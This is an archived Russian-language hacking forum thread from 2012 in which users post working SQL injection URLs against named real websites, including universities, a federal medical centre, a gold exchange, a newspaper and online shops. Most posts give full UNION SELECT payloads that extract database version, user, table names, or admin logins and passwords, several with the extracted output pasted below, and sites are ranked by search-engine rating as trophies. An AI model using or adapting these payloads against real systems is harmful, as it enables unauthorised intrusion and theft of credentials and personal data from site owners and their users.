ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.01.2012, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сообщение от bodrich
bodrich said:
http://www.sotovikm.ru/tovar.php?ID=18209+union+select+1
Как здесь обходить фильтрацию пробелов я хз
Это надо постить в тему с вопросами и там фильтрация не только пробелов.
|
|
|
|
23.01.2012, 16:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Код:
Code:
http://www.atlanticframe.com/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
PR: 3
version: 5.0.91
database: Website2009
user: Greenfield09@205.178.145.68
Официальный сайт Федеральной службы по надзору в сфере образования и науки // Для истории (уязвимость залатали)
Код:
Code:
http://obrnadzor.gov.ru/ru/press_center/gallery/index.php?album_id40=35'sql-injection'
тИЦ: 3300 / PR: 8
Сообщение от None
Уважаемый ----
Благодарим Вас за содействие. В настоящее время Федеральной службой по надзору в сфере образования и науки проведены работы по повышению общей защищенности сайта.
Будем признательны, если Вы и в дальнейшем сможете обращать внимание на аспекты деятельности Рособрнадзора, требующие совершенствования.
---
С уважением,
Постников Алексей Александрович,
Начальник Управления делами Рособрнадзора
Email: postnikov@obrnadzor.gov.ru
|
|
|
|
23.01.2012, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
Кафедра квантовой физики МГУ
PR = 4
Код:
Code:
http://nanolab.phys.msu.ru/person.php?lang=rus&id=-29+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12,13+from+user--
При выводе пароля обрезает union
|
|
|
|
24.01.2012, 11:29
|
|
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076
Репутация:
42
|
|
Университет на Гаваях.
Код:
Code:
http://hilo.hawaii.edu/academics/hohonu/writing.php?id=1-666.666+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),2,3,4,5,6--
Database Version: 5.0.92-log
Database name: hohonu
User name: hohonu@www.uhh.hawaii.edu
ТИЦ: 800
PR: 7 |
|
|
25.01.2012, 18:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
Федеральное государственное учреждение "Федеральный медицинский биофизический центр имени А.И.Бурназяна"
ТиЦ = 80
PR = 4
Код:
Code:
http://www.fmbcfmba.ru/index.php?type=page&page_id=-10+union+select+1,2,table_name,4,5,6,version%28%29+from+information_schema.tables%20--
|
|
|
|
26.01.2012, 15:05
|
|
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076
Репутация:
42
|
|
Американская золотая биржа.
Код:
Code:
http://www.amergold.com/vault/numisdetails.php?id=1-666.666+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),9,10,11,12,13,14--
Database Version: 5.0.77
Database name: age
User name: amergold@localhost
ТИЦ: 10
PR: 4
Газета Financial Express (Бангладеш).
Код:
Code:
http://www.thefinancialexpress-bd.com/innerpage.php?page_category_id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71)--
Database Version: 5.0.92-50-log
Database name: thefinan_db
User name: thefinan_fe@localhost
ТИЦ: 20
PR: 5 |
|
|
|
27.01.2012, 02:17
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
ТИЦ 110 Траф 1К
Код:
Code:
http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5--+
iwanttobeh_biu@localhost:iwanttobeh_bi:5.1.46
Код:
Code:
http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,name,info%29,3,4,5+from+magazine--+
|
|
|
|
27.01.2012, 11:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сообщение от None
hxxp://services.shop3m.com/search/?btnG.x=18&btnG.y=18&btnG=Search&keyword=' OR 1=1-- '
PR: 5
Alexa Rank: 187,654
OS: Linux Red Hat Enterprise 5 (Tikanga)
Database: MySQL > 5
User: root@localhost
file_priv Y
Сразу выложу БД, чтобы не мучались : ))
information_schema
myaccount
mysql
newsletters
shop3Msearch
WDSR
|
|
|
|
27.01.2012, 14:53
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
ТИЦ 100 Траф 1К
Код:
Code:
http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--+
bg@localhost:bg:5.0.51a-24+lenny5-log
Код:
Code:
http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,group_concat%280x3a,usersName,usersEmail%29,3,4,5,6,7,8,9,10,11+from+users_t--+
http://www.braingames.ru/admin - 403
|
|
|
|
28.01.2012, 23:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
Яндекс тИЦ 60
Google Page Rank 4/10
Сообщение от None
http://enter.private.com/signup/signup.php?nats=MC4wLjIuNi4wLjAuMC4wLjA&idScene=-7161+union+select+1,2,3,4,5,6,group_concat%28Login ,0x0a,Pass,0x0a%29,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+from+adminlogin
Админку так и не нашёл =( |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
